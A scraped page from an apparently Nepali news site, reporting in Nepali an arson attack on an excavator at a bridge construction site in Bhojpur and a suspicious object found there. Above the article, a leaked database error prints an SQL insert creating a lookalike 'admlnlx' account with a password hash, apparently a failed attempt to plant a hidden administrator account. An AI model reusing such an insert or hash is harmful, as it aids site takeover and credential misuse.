WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNNsQsSLdDPk.G5wzpCICTnnm2ZD.B0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:03:36', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ११ भाद्र, काठमाण्डौ । भोजपुर नगरपालिका–१२ र रामप्रसाद राई गाउँपालिका–५ मानेभञ्याङ जोड्ने पिखुला खोलामा निर्माधिन पक्की पुलमा सन्चाल भाईरहेको एक्जाभेटरमा अज्ञात समूहले आगजनी गरेको छ ।
पुल निर्माणको जिम्मा लिएको मार्सेली निर्माण सेवाले निर्माणस्थलमा राखेको उक्त एक्जाभेटरमा पेट्रोल छर्केर आगजनी गरिएकोे जिल्ला प्रहरी कार्यालयले जनाएको छ ।
आगजनी भएको स्थानमा शंकास्पद वस्तु फेला पारेकाले निगरानी भइरहेको र नेपाली सेनाको विज्ञ टोली आएपछि त्यसलाई डिस्पोज गरिने प्रहरीले जनाएको छ ।
प्रदेश सरकारको रु छ करोड ५३ लाखको लागतमा करीब एक हप्ता अगाडि पुल निर्माण शुरु गरिएको हो ।